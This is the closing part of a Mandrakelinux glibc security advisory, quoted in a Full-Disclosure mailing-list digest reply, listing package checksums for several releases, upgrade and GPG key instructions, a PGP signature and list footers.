10.0/RPMS/glibc-doc-2.3.3-12.8.100mdk.i586.rpm
b360e6de9b0dc63a7360597b345eb113
10.0/RPMS/glibc-doc-pdf-2.3.3-12.8.100mdk.i586.rpm
d40de60e1c3021267abe117bf2568b04
10.0/RPMS/glibc-i18ndata-2.3.3-12.8.100mdk.i586.rpm
21965846712d7db2a19c581a4998dc8c
10.0/RPMS/glibc-profile-2.3.3-12.8.100mdk.i586.rpm
1df7c34978d7f23e062e2145d75fcd94
10.0/RPMS/glibc-static-devel-2.3.3-12.8.100mdk.i586.rpm
18cd827de946a15585316e1aedc7f516
10.0/RPMS/glibc-utils-2.3.3-12.8.100mdk.i586.rpm
5556bc2a07cfb6c7596f8651709e26a3
10.0/RPMS/ldconfig-2.3.3-12.8.100mdk.i586.rpm
78ada3afab77a2eb0bf69f22e6913a61
10.0/RPMS/nptl-devel-2.3.3-12.8.100mdk.i586.rpm
33eb2a77406744a96f0b62ac99e6c6b5 10.0/RPMS/nscd-2.3.3-12.8.100mdk.i586.rpm
e0f8c3de9f84b2a2517e9e436c9d78ad
10.0/RPMS/timezone-2.3.3-12.8.100mdk.i586.rpm
29e42ae1c249e1e44676356d65e48e8c 10.0/SRPMS/glibc-2.3.3-12.8.100mdk.src.rpm
Mandrakelinux 10.0/AMD64:
8f497e10e0fdb577a98e836b599b6ba6
amd64/10.0/RPMS/glibc-2.3.3-12.8.100mdk.amd64.rpm
85f8288b5b457e99d07157160ea57d99
amd64/10.0/RPMS/glibc-debug-2.3.3-12.8.100mdk.amd64.rpm
24d3105e9a8604c24490d2f798d2d905
amd64/10.0/RPMS/glibc-devel-2.3.3-12.8.100mdk.amd64.rpm
0ba375ae866a114ac133419b1fcd6977
amd64/10.0/RPMS/glibc-doc-2.3.3-12.8.100mdk.amd64.rpm
240367c5128ac78428c67a84207892ec
amd64/10.0/RPMS/glibc-doc-pdf-2.3.3-12.8.100mdk.amd64.rpm
fcdd0f7867c325e4e56282e8ee038cf5
amd64/10.0/RPMS/glibc-i18ndata-2.3.3-12.8.100mdk.amd64.rpm
335c67618af7d5bc6ee78b535250fa32
amd64/10.0/RPMS/glibc-profile-2.3.3-12.8.100mdk.amd64.rpm
f513e41b3c9cf834878e82a302031b94
amd64/10.0/RPMS/glibc-static-devel-2.3.3-12.8.100mdk.amd64.rpm
5ecd5b9c15f28464ef1f0a7a42cb49e2
amd64/10.0/RPMS/glibc-utils-2.3.3-12.8.100mdk.amd64.rpm
3f55bcf134eb71f267c0894a50cfc8ee
amd64/10.0/RPMS/ldconfig-2.3.3-12.8.100mdk.amd64.rpm
1f64867fe40119309070d2f9cd33f274
amd64/10.0/RPMS/nptl-devel-2.3.3-12.8.100mdk.amd64.rpm
1f93d5f94052b52a2b42c3f057b24a45
amd64/10.0/RPMS/nscd-2.3.3-12.8.100mdk.amd64.rpm
a9f02cf82620c6e74341be95bd74b9b6
amd64/10.0/RPMS/timezone-2.3.3-12.8.100mdk.amd64.rpm
29e42ae1c249e1e44676356d65e48e8c
amd64/10.0/SRPMS/glibc-2.3.3-12.8.100mdk.src.rpm
Mandrakelinux 10.1:
1bfd1552a89e67230d560837e8a52be8 10.1/RPMS/glibc-2.3.3-23.1.101mdk.i586.rpm
feaefe712886221650ee11c17c2ee60c
10.1/RPMS/glibc-debug-2.3.3-23.1.101mdk.i586.rpm
363152222d78953d66a1ab907422c362
10.1/RPMS/glibc-devel-2.3.3-23.1.101mdk.i586.rpm
c396e0fa56bf99514947db942f603a93
10.1/RPMS/glibc-doc-2.3.3-23.1.101mdk.i586.rpm
0af69cde9a1ee5a9880ab20a4084ec40
10.1/RPMS/glibc-doc-pdf-2.3.3-23.1.101mdk.i586.rpm
36af3cda588047bdd0438ab99fc5172a
10.1/RPMS/glibc-i18ndata-2.3.3-23.1.101mdk.i586.rpm
e2221cb00b488d72cf4c61302771a639
10.1/RPMS/glibc-profile-2.3.3-23.1.101mdk.i586.rpm
c9eeea5047ce49a11299f038cce43cf2
10.1/RPMS/glibc-static-devel-2.3.3-23.1.101mdk.i586.rpm
62d1c85236fdc348d5bb8ffc763d43ad
10.1/RPMS/glibc-utils-2.3.3-23.1.101mdk.i586.rpm
db0df09231bf64cb7aa70c771e15599a
10.1/RPMS/ldconfig-2.3.3-23.1.101mdk.i586.rpm
3aadb015bad4d08bbae72469836f4d05
10.1/RPMS/nptl-devel-2.3.3-23.1.101mdk.i586.rpm
a5fcb4e74b84d4fc9d645652527e20d5 10.1/RPMS/nscd-2.3.3-23.1.101mdk.i586.rpm
47d6540793020f021bfc9c0b9f3b2276
10.1/RPMS/timezone-2.3.3-23.1.101mdk.i586.rpm
0734f25c465b9ebcf39180a6fdf44d53 10.1/SRPMS/glibc-2.3.3-23.1.101mdk.src.rpm
Mandrakelinux 10.1/X86_64:
387ea4a78ad359905011f180d821b258
x86_64/10.1/RPMS/glibc-2.3.3-23.1.101mdk.x86_64.rpm
622a53d71f3ffdbd80b6adbec1a53d03
x86_64/10.1/RPMS/glibc-debug-2.3.3-23.1.101mdk.x86_64.rpm
ecbf0ca4f665927cebef470f4b5b0aa2
x86_64/10.1/RPMS/glibc-devel-2.3.3-23.1.101mdk.x86_64.rpm
bcc5d43efc32b2a3722ab8bac7c086fb
x86_64/10.1/RPMS/glibc-doc-2.3.3-23.1.101mdk.x86_64.rpm
0650cc94e3ff7d3441e196875924ac9e
x86_64/10.1/RPMS/glibc-doc-pdf-2.3.3-23.1.101mdk.x86_64.rpm
72b508b5295d72a8b96c3fe78efa6007
x86_64/10.1/RPMS/glibc-i18ndata-2.3.3-23.1.101mdk.x86_64.rpm
e6a8a85bc80f481cbb9c2c29dd9ae1f6
x86_64/10.1/RPMS/glibc-profile-2.3.3-23.1.101mdk.x86_64.rpm
545a8840739ae3716f6234868e5de16f
x86_64/10.1/RPMS/glibc-static-devel-2.3.3-23.1.101mdk.x86_64.rpm
b396d0af7a534763db7359b26c950448
x86_64/10.1/RPMS/glibc-utils-2.3.3-23.1.101mdk.x86_64.rpm
6fdedd56d68856e638fe1f6dcaea6f17
x86_64/10.1/RPMS/ldconfig-2.3.3-23.1.101mdk.x86_64.rpm
e2ef0b1a4d2e492328a7d408878c13d7
x86_64/10.1/RPMS/nptl-devel-2.3.3-23.1.101mdk.x86_64.rpm
37edf16413ba9f036ba5434f31832881
x86_64/10.1/RPMS/nscd-2.3.3-23.1.101mdk.x86_64.rpm
68b7cdb358e9fbd38eba38dbb9216eed
x86_64/10.1/RPMS/timezone-2.3.3-23.1.101mdk.x86_64.rpm
0734f25c465b9ebcf39180a6fdf44d53
x86_64/10.1/SRPMS/glibc-2.3.3-23.1.101mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrakeUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandrakesoft for security. You can obtain
the GPG public key of the Mandrakelinux Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandrakelinux at:
http://www.mandrakesoft.com/security/advisories
If you want to report vulnerabilities, please contact
security_linux-mandrake.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team
<security linux-mandrake.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQFB03T2mqjQ0CJFipgRAsGxAJ4w5MrLm/iq1meYV9yMg8sMbCHbrgCguhSR
l+3oHXol5pgiVuE/RyjXBH0=
=gAsH
-----END PGP SIGNATURE-----
------------------------------
_______________________________________________
Full-Disclosure mailing list
Full-Disclosure () lists netsys com
https://lists.netsys.com/mailman/listinfo/full-disclosure
End of Full-Disclosure Digest, Vol 1, Issue 2144
************************************************
********************************************************************
This email may contain information which is privileged or confidential. If you are not the intended recipient of this
email, please notify the sender immediately and delete it without reading, copying, storing, forwarding or disclosing
its contents to any other person
Thank you
Check us out at http://www.bt.com/consulting
********************************************************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [Full-Disclosure] RE: Full-disclosure Digest, Vol 1, Issue 2144 steve.dangerfield (Dec 30)